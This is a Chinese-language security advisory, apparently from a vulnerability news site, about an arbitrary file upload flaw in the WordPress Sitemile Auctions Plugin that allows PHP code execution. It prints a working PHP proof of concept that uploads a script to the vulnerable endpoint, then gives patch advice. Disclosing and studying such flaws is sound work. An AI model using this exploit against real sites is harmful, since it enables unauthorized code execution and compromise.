发布日期:2012-06-19
更新日期:2012-06-20受影响系统:
WordPress Sitemile Auctions Plugin 2.x
描述:
--------------------------------------------------------------------------------
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。Sitemile Auctions Plugin for WordPress 2.0.1.3之前版本的wp-content/plugins/auctionPlugin/upload.php脚本允许上传任意扩展名的文件到webroot文件夹中,可通过上传恶意PHP脚本执行任意PHP代码。<*来源:Sammy Forgit
链接:http://secunia.com/advisories/49497/
http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-auctions-plugin-arbitrary-file-upload-vulnerability.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Sammy Forgit ()提供了如下测试方法:PostShell.php
<?php$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/auctionPlugin/uploadify/upload.php?folder=/wordpress/wp-content/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array("Filedata"=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";?>Shell Access : http://www.exemple.com/wordpress/wp-content/uploads/lo.php
Filename : [CTRL-u] PostShell.php after executedlo.php
<?php
phpinfo();
?>建议:
--------------------------------------------------------------------------------
厂商补丁:WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://wordpress.org/IBM Lotus Notes “notes” URI处理器漏洞LibTIFF “tiff2pdf”整数溢出漏洞相关资讯 WordPress漏洞
- Wordpress 跨站请求伪造漏洞(CVE- (今 16:15)
- WordPress wp_get_attachment_link (06月30日)
- WordPress customizer重定向限制绕 (06月30日)
| - Wordpress Admin API拒绝服务漏洞( (今 16:14)
- WordPress column_title跨站脚本漏 (06月30日)
- WordPress 访问限制绕过漏洞(CVE- (06月30日)
|
本文评论 查看全部评论 (0)